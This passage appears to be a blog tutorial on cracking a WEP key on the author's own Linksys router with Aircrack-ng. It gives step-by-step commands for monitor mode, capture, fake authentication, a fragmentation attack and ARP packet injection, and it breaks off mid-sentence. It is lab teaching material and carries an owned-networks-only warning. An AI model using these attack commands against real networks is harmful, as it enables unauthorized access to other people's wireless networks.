Introduction to Wireless Security with Aircrack-ng
Today we’re going to walk through a few WiFi testing examples using Aircrack-ng, which is a suite of wireless network security tools. It allows us to monitor and export packet data, attack access points and clients, and crack WEP and WPA keys. I’ve included some links at the bottom if anyone wants to do more research on wireless, RC4, or Aircrack-ng.
In a nutshell, we are going to set up a couple test scenarios and then walk through some different attack methods. We’ll scan for our wireless access point (AP), setup a traffic capture, generate network traffic, and then step through different methods of gaining the wireless key. During these examples, keep in mind the complexity of the passphrase being used and the different ways those keys can be discovered. Also, as a reminder, only test against devices or networks that you own or have express written permission to test.
For these tests, here is my current hardware and setup:
I’m using a WiFi connection (not a hard line) Kali 2018.2 (running on VMware Workstation 14 Player) Alpha Wireless USB Adapter (Model: AWUS036NH, FCC ID: UQ2036NH, Driver: rt2800usb) My test Access Point is a Linksys WRT54G router Connection Type: Automatic Configuration DHCP DHCP Server: Disabled Note: the first time I set this up, some tinkering was needed to get this router chained off my main routerTo get started, the first thing we’ll want to do is check the wireless interface and start a quick airodump-ng scan to make certain we can detect our test AP. For the first test example, I’ll detail the parameters used, but will leave them off for the others.
iwconfig You should see wlan0, and it should initially show as Mode:Managed iw dev wlan0 scan | egrep “SSID:|DS\ Parameter\ set” You should see the SSID for your AP and what channel it’s on: SSID: starmonkey DS Parameter set: channel 11Originally, I was using a Backtrack 5 instance. As such, there are a few differences I ran into when trying to use airodump-ng with Kali 2018.2. Rather than using airmon-ng to start your wireless card in monitor mode, you may need to manually set the interface to monitor mode. These steps may not be needed with every wireless card or in every configuration, but they worked consistently for me. I’m including it in case this helps others who have had some difficulty getting airodump-ng to detect access points in later versions of Kali.
Put wlan0 into monitor mode manually: ifconfig wlan0 down iwconfig wlan0 mode monitor use ‘mode managed’ to put the card back into managed mode ifconfig wlan0 up iwconfig wlan0 wlan0 should show as Mode:Monitor airodump-ng should now be able to see access pointsFor the first example, I’ll generate a random passphrase for my router and use a fragmentation attack to recover the key.
Example #1: Passphrase: t!k#^ADe6B&C4Cgd Wireless Network Mode: Mixed Wireless Network Name (ESSID): starmonkey Wireless Channel: 11 2.462GHz Security Mode: WEP WEP Encryption: 128 bits 26 hex digits No MAC filters enabled Authentication Type: Auto Shared key authentication is more secure, but all devices on your network must also support Shared Key authentication No connected devices for this example Note: you may want to use 3-4 terminal windows so that you can move around easilyWith wlan0 in monitor mode, we can scan through all channels, scan just one channel, or even scan for a specific AP on a single channel. This is helpful when we just want to see what’s out there but not capture any traffic. Let’s check to make sure that there aren’t any DHCP processes that may interfere with testing. This should be done before each test:
airmon-ng check airmon-ng check killIn the first terminal window, we’ll use airodump-ng to get the MAC address of the AP and wireless interface:
airodump-ng wlan0 This will scan through the channels and display the AP’s that have been detected Ctrl+C to cancel out of the airodump-ng screen macchanger -s wlan0In this case, my AP MAC is 00:14:BF:AE:15:6C, and my wireless MAC is 00:C0:CA:92:63:AE. For the first example, I’ll type out the actual MAC addresses, but for the other examples I’ll use the abbreviations as I learned them.
<AP> = the MAC of the access point <MON> = the MAC of our wireless interface in monitor mode <VIC> = the MAC of the connected computer or deviceSo, now we’re ready to start our traffic capture and only target the test device.
airodump-ng -c 11 bssid 00:14:BF:AE:15:6C -w example1 wlan0 -c is for the channel (11) bssid is the AP MAC -w is to write the capture information into a file (example1) wlan0 is the wireless interfaceIt should be noted that a fragmentation attack needs to be done with a MAC that is associated to the AP. Since no other devices are connected, we’ll use aireplay-ng in a second terminal window to fake-authenticate to the AP.
aireplay-ng -1 60 -e starmonkey -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0 aireplay-ng -1 is for the fake authentication -e is for the essid (starmonkey) -a is for the AP MAC -h is for my wifi MAC wlan0 is our interfaceBy now, you should see something similar to this on your first terminal screen:
In a third terminal window, use a fragmentation attack to obtain a .xor file:
aireplay-ng -5 -b 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE wlan0 aireplay-ng -5 is for a fragmentation attack -b is the AP MAC -h is the wireless MAC wlan0 is the interface being used You will be prompted to use a packet. If it is successful, a .xor file will be created similar to this: fragment-0901-144136.xorNext, use packetforge-ng to create an injectable packet and write the results to a capture file:
packetforge-ng -0 -a 00:14:BF:AE:15:6C -h 00:C0:CA:92:63:AE -l 192.168.1.101 -k 192.168.1.255 -y fragment-0901-144136.xor -w fragmentation.cap -0 is used to generate an ARP request packet -a is the AP MAC -h is the wireless MAC -l is the source IP (255.255.255.255 can sometimes be used) -k is the destination IP (255.255.255.255 can sometimes be used) -y uses the PRGA file (fragment-0901-144136.xor) -w writes the packet information to a file (fragmentation.cap)Once the packet has been created, we can now inject it into the network to generate our #Data traffic:
aireplay-ng -2 -r fragmentation.cap wlan0 -2 is for an interactive